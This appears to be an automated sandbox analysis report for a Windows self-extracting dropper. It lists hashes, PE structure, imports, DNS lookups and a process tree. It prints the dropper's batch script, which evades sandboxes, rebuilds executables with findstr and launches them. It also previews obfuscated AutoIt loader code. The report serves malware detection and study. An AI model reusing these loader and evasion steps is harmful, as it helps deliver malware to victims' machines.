                                Preview:Set UZULuYz=%userdomain%..Set GmSTCT=DESKTOP-QO5QU33..if %UZULuYz%==%GmSTCT% exit ..<nul set /p = "MZ" > Inebriarti.exe.com..findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm >> Inebriarti.exe.com"..copy Conoscermi.vstm A..start Inebriarti.exe.com A..<nul set /p = "MZ" > Bonta.exe.com..findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm >> Bonta.exe.com"..copy Nel.vstm m..start Bonta.exe.com m..<nul set /p = "MZ" > Pensiero.exe.com..findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm >> Pensiero.exe.com"..copy Secondo.vstm E..start Pensiero.exe.com E..ping 127.0.0.1 -n 30....

                                C:\Users\user\AppData\Local\Temp\7ZipSfx.000\m

                                Download File
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with very long lines (521), with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):874247
                                Entropy (8bit):5.845938060923655
                                Encrypted:false
                                SSDEEP:12288:vQfX7AlWSi++7WQ777U5wv7sDqGdZzsAwMmk+1T:n5zbYT
                                MD5:676BE9E97E242CCAA40DE8C8342F2381
                                SHA1:F25CA9A365927163836213172F300B6E9A09311A
                                SHA-256:5B0198597C3BB1582AD4ED0DB205772BE9E54B5F3363C7449EC1477F0A2C172F
                                SHA-512:3AF0610DCC1C3F8253AF454102047828FD431D137593CD083E50BC34AC20516A6C975F7CADEDB9F910F0120FDD3D35E0E267708042A2C1EDAD04C611314426AB
                                Malicious:false
                                Preview:..Func zsQzlxmFuQcHzpEjECX($TFjYd,$umipzZZ,$dLJus,$oCMsKSF,$ZVadMtOtS,$DOzy,$HeIzYhBVv,$hLrAGGN)..Local $kQejVvkTGCCieDtfwmGMnqWKnaLEkvPO = 'FNRqcnCwIgTryIAcsEgxxwlTsOCLHHlMOUbPhfGwtKQMrHaKkoTRBzSDCXIHVQxqtufkkKoeYhdKknQKcSAnOakxeTjdGYuhdPHWsimAqRTgroaruYjedVjLVUosbScZiezcQUahzZnWnXsUBppIM'...$AvqiIzfJvVob = 178..$EebXGMktXNLMmQ = 61..While ((7021-7020)*6462)..Switch $AvqiIzfJvVob..Case 175....$zeoBmgmbAjaJckOE = Execute(GKHRXxdEq("76_91_114_104_44_75_88_73_72_80_108_81_104_102_126_75_124_91_90_101_45",4))..$120 = 103..For $MqfarxXHPTlQSCRWgkqgvubMGbAzrtFbAxokCafIlUKcgGIKAMiZOfmGC = 8 To 21..Local $qPPSsXFJlUCIZGJ = 'FdZiCflsUaktvkXpmyLQtMjOIruCQXxfkDnkvVVKEbYYLBhYXaoTUSK'..Local $zeoBmgmbAjaJckOE = GKHRXxdEq("107_110_110_112_72_66_88",0)..Next....$AvqiIzfJvVob = $AvqiIzfJvVob + 1..Case 176....$TSMMMElwkGNheiQiF = Execute(GKHRXxdEq("74_89_112_102_42_101_84_114_84_68_78_82_111_102_103_123_80_112_89_86_85_72_104_43",2))..$97 = 87..For $OBxaTFikvvAXWwwQHxjlGEJTHryQpsIewrovAAZiFBiOAgJMkkm

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.983820693117877
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Tt843YGUx5.exe
                                File size:9'326'758 bytes
                                MD5:0d6bbe5907ca581fec7c452793aa1257
                                SHA1:103b6e60ec864afc723f9fd0f8c29f91a0fcc4c7
                                SHA256:a1734a3cebd107003588c3b860dd235827515439325aa5bd07dbe3e798cd2e48
                                SHA512:3691b3b107f9abd4bbaee89905ab868eade9770db2451fd8ee2e0efaadcd88aef032b36e64029949f184c5646484d3b09fac6741dc5ee68717a5e8275148744a
                                SSDEEP:196608:vAa0g6X40mv/pyNQcRqZ9v5nQb00k0C2onRjRkZ7P2dLehT4C:v6isNFkBQwjd2eRjM2KT4C
                                TLSH:899623D72931A078CC46D9B4389C4A76D337EB84C28F33CA337056661C7A255AD68FDA
                                File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L......V............................?.............@..................................................................................0...u.................

                                File Icon

                                Icon Hash:2b2b2b2bc469134e

                                Static PE Info

                                General

                                Entrypoint:0x41883f
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:
                                Time Stamp:0x56B8F009 [Mon Feb 8 19:44:09 2016 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:650ed02ca4b6baad6b24f20402b6268b

                                Entrypoint Preview

                                Instruction
                                push ebp
                                mov ebp, esp
                                push FFFFFFFFh
                                push 0041C6A0h
                                push 004189D0h
                                mov eax, dword ptr fs:[00000000h]
                                push eax
                                mov dword ptr fs:[00000000h], esp
                                sub esp, 68h
                                push ebx
                                push esi
                                push edi
                                mov dword ptr [ebp-18h], esp
                                xor ebx, ebx
                                mov dword ptr [ebp-04h], ebx
                                push 00000002h
                                call dword ptr [0041A1E4h]
                                pop ecx
                                or dword ptr [00422A88h], FFFFFFFFh
                                or dword ptr [00422A8Ch], FFFFFFFFh
                                call dword ptr [0041A1E8h]
                                mov ecx, dword ptr [00420A74h]
                                mov dword ptr [eax], ecx
                                call dword ptr [0041A1ECh]
                                mov ecx, dword ptr [00420A70h]
                                mov dword ptr [eax], ecx
                                mov eax, dword ptr [0041A1F0h]
                                mov eax, dword ptr [eax]
                                mov dword ptr [00422A84h], eax
                                call 00007F7688C90062h
                                cmp dword ptr [0041E6A0h], ebx
                                jne 00007F7688C8FF4Eh
                                push 004189C8h
                                call dword ptr [0041A1F4h]
                                pop ecx
                                call 00007F7688C90034h
                                push 0041E068h
                                push 0041E064h
                                call 00007F7688C9001Fh
                                mov eax, dword ptr [00420A6Ch]
                                mov dword ptr [ebp-6Ch], eax
                                lea eax, dword ptr [ebp-6Ch]
                                push eax
                                push dword ptr [00420A68h]
                                lea eax, dword ptr [ebp-64h]
                                push eax
                                lea eax, dword ptr [ebp-70h]
                                push eax
                                lea eax, dword ptr [ebp-60h]
                                push eax
                                call dword ptr [0041A1FCh]
                                push 0041E060h
                                push 0041E000h
                                call 00007F7688C8FFECh

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1cacc0xc8.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000xc75a0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x384.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x181aa0x18200b1409dd4b532861bfc867262e1487da9False0.5987694300518135data6.681336648046548IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x1a0000x3d760x3e000241c5b58fde24391bd915d012102084False0.46213457661290325DOS executable (COM, 0x8C-variant)5.764905469559544IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x1e0000x4a900x800ec6e65fd2a2541d624ba3966eb98f291False0.4033203125data3.529989171404316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x230000xc75a00xc76002470a75253077d2c139c46a214cf3465False0.7342451998432602data7.467674937095469IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x234a80x3714PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8552482269503546
                                RT_ICON0x26bbc0x1b09PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9270336656552521
                                RT_ICON0x286c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.040133680350171536
                                RT_ICON0x38ef00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.05271179314694135
                                RT_ICON0x423980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.06682070240295748
                                RT_ICON0x478200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.060108644307982996
                                RT_ICON0x4ba480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.09190871369294606
                                RT_ICON0x4dff00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.10717636022514071
                                RT_ICON0x4f0980x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.17991803278688526
                                RT_ICON0x4fa200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2322695035460993
                                RT_STRING0x4fe880x4a8dataEnglishUnited States0.3221476510067114
                                RT_STRING0x503300x438dataEnglishUnited States0.3731481481481482
                                RT_STRING0x507680x26Matlab v4 mat-file (little endian) ., numeric, rows 0, columns 0EnglishUnited States0.5263157894736842
                                RT_STRING0x507900xaedataEnglishUnited States0.6724137931034483
                                RT_STRING0x508400x2f2dataEnglishUnited States0.35543766578249336
                                RT_STRING0x50b340x3adataEnglishUnited States0.6896551724137931
                                RT_STRING0x50b700x192dataEnglishUnited States1.027363184079602
                                RT_STRING0x50d040x3a8dataEnglishUnited States0.37393162393162394
                                RT_STRING0x510ac0x2cedataEnglishUnited States0.42618384401114207
                                RT_RCDATA0x5137c0x98ecadataEnglishUnited States0.9082726404822647
                                RT_GROUP_ICON0xea2480x92dataEnglishUnited States0.7054794520547946
                                RT_MANIFEST0xea2dc0x2c3XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5035360678925035

                                Imports

                                DLLImport
                                COMCTL32.dll
                                SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                USER32.dllCreateWindowExW, GetWindowLongW, GetMessageW, DispatchMessageW, KillTimer, ScreenToClient, CharUpperW, SendMessageW, EndDialog, wsprintfW, MessageBoxW, GetWindowRect, GetParent, CopyImage, ReleaseDC, GetWindowDC, SetWindowPos, DestroyWindow, GetClassNameA, wsprintfA, GetWindowTextW, GetWindowTextLengthW, SetWindowTextW, GetSysColor, MessageBoxA, GetKeyState, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, GetMenu, SetTimer
                                ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                OLEAUT32.dllSysAllocStringLen, VariantClear, SysFreeString, OleLoadPicture, SysAllocString
                                KERNEL32.dllSetFileTime, SetEndOfFile, GetFileInformationByHandle, VirtualFree, GetModuleHandleA, WaitForMultipleObjects, VirtualAlloc, ReadFile, SetFilePointer, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, SuspendThread, TerminateThread, GetSystemDirectoryW, GetCurrentThreadId, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, SetEnvironmentVariableW, GetTempPathW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, LoadLibraryA, SetThreadLocale, lstrlenW, GetSystemTimeAsFileTime, ExpandEnvironmentStringsW, CompareFileTime, WideCharToMultiByte, FindFirstFileW, lstrcmpW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, GetEnvironmentVariableW, lstrcmpiW, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, GetProcAddress, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, lstrlenA, WriteFile, GetStdHandle, GetModuleHandleW, GetStartupInfoA
                                MSVCRT.dll_purecall, memcmp, ??2@YAPAXI@Z, memmove, memcpy, _wtol, strncpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, malloc, free, wcsstr, _CxxThrowException, wcscmp, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, wcsncpy, ??3@YAXPAX@Z

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Network Port Distribution

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Feb 9, 2025 07:59:07.476855993 CET5094453192.168.2.41.1.1.1
                                Feb 9, 2025 07:59:07.487382889 CET53509441.1.1.1192.168.2.4
                                Feb 9, 2025 07:59:07.555464029 CET5578953192.168.2.41.1.1.1
                                Feb 9, 2025 07:59:07.564788103 CET53557891.1.1.1192.168.2.4
                                Feb 9, 2025 07:59:09.391690016 CET5672253192.168.2.41.1.1.1
                                Feb 9, 2025 07:59:09.400002956 CET53567221.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Feb 9, 2025 07:59:07.476855993 CET192.168.2.41.1.1.10x6591Standard query (0)OEEMOUIIEJHDT.OEEMOUIIEJHDTA (IP address)IN (0x0001)false
                                Feb 9, 2025 07:59:07.555464029 CET192.168.2.41.1.1.10xe0bStandard query (0)NiXfPuxauHolCHyB.NiXfPuxauHolCHyBA (IP address)IN (0x0001)false
                                Feb 9, 2025 07:59:09.391690016 CET192.168.2.41.1.1.10x9d76Standard query (0)OreSqbuLLIH.OreSqbuLLIHA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Feb 9, 2025 07:59:07.487382889 CET1.1.1.1192.168.2.40x6591Name error (3)OEEMOUIIEJHDT.OEEMOUIIEJHDTnonenoneA (IP address)IN (0x0001)false
                                Feb 9, 2025 07:59:07.564788103 CET1.1.1.1192.168.2.40xe0bName error (3)NiXfPuxauHolCHyB.NiXfPuxauHolCHyBnonenoneA (IP address)IN (0x0001)false
                                Feb 9, 2025 07:59:09.400002956 CET1.1.1.1192.168.2.40x9d76Name error (3)OreSqbuLLIH.OreSqbuLLIHnonenoneA (IP address)IN (0x0001)false

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:01:59:04
                                Start date:09/02/2025
                                Path:C:\Users\user\Desktop\Tt843YGUx5.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Tt843YGUx5.exe"
                                Imagebase:0x400000
                                File size:9'326'758 bytes
                                MD5 hash:0D6BBE5907CA581FEC7C452793AA1257
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:1
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
                                Imagebase:0x1a0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com
                                Wow64 process (32bit):true
                                Commandline:Inebriarti.exe.com A
                                Imagebase:0x760000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 3%, ReversingLabs
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
                                Imagebase:0x1a0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com
                                Wow64 process (32bit):true
                                Commandline:Bonta.exe.com m
                                Imagebase:0xa50000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 3%, ReversingLabs
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com A
                                Imagebase:0x760000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:9
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\findstr.exe
                                Wow64 process (32bit):true
                                Commandline:findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
                                Imagebase:0x1a0000
                                File size:29'696 bytes
                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:10
                                Start time:01:59:05
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com m
                                Imagebase:0xa50000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                General

                                Target ID:11
                                Start time:01:59:06
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com
                                Wow64 process (32bit):true
                                Commandline:Pensiero.exe.com E
                                Imagebase:0x3d0000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 3%, ReversingLabs
                                Has exited:true

                                General

                                Target ID:12
                                Start time:01:59:06
                                Start date:09/02/2025
                                Path:C:\Windows\SysWOW64\PING.EXE
                                Wow64 process (32bit):true
                                Commandline:ping 127.0.0.1 -n 30
                                Imagebase:0x670000
                                File size:18'944 bytes
                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:13
                                Start time:01:59:07
                                Start date:09/02/2025
                                Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com E
                                Imagebase:0x3d0000
                                File size:893'608 bytes
                                MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Disassembly

                                Reset < >